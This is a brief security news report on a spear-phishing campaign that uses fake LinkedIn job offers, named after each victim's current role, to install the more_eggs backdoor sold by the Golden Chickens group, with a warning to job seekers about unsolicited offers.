A new spear-phishing campaign was revealed by security researchers that could be designed to install Trojan malware on the devices of the LinkedIn users.
The researchers warn the job hunters to be cautious of unsolicited job offers.
The eSentire Threat Response Unit (TRU) claimed that individuals were being targeted with customized files that has the same name as their own current role.
When the users open the fake job offer, they unwittingly initiate the stealthy installation of the fileless backdoor, more_eggs. Once loaded, the sophisticated backdoor can download additional malicious plugins and provide hands-on access to the victim’s computer.
The threat actors behind more_eggs, Golden Chickens, sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cyber criminals.
Once more_eggs is installed, the backdoor can be used by Golden Chickens customers to promote their own campaigns, by infecting with additional malware like ransomware, credential stealers and banking Trojans. Backdoor access could also be used to find and collect sensitive data from the victims’ machine.
The attackers are believed to be taking advantage of the large number of COVID-19 redundancies in the US to spread this email campaign. With the victim’s own LinkedIn job position as the name of the malicious Zip file has a greater chance of them opening it.
The Trojan also abuses legitimate Windows processes such as WMI to evade detection by traditional AV tools.
eSentire stated that this campaign is similar to the one in 2019 in which employees of US retail, entertainment and pharmaceutical companies were targeted by the same more_eggs Trojan disguised as a job offer matching their own current position.
It is not exactly clear as to who is behind the Golden Chickens group.
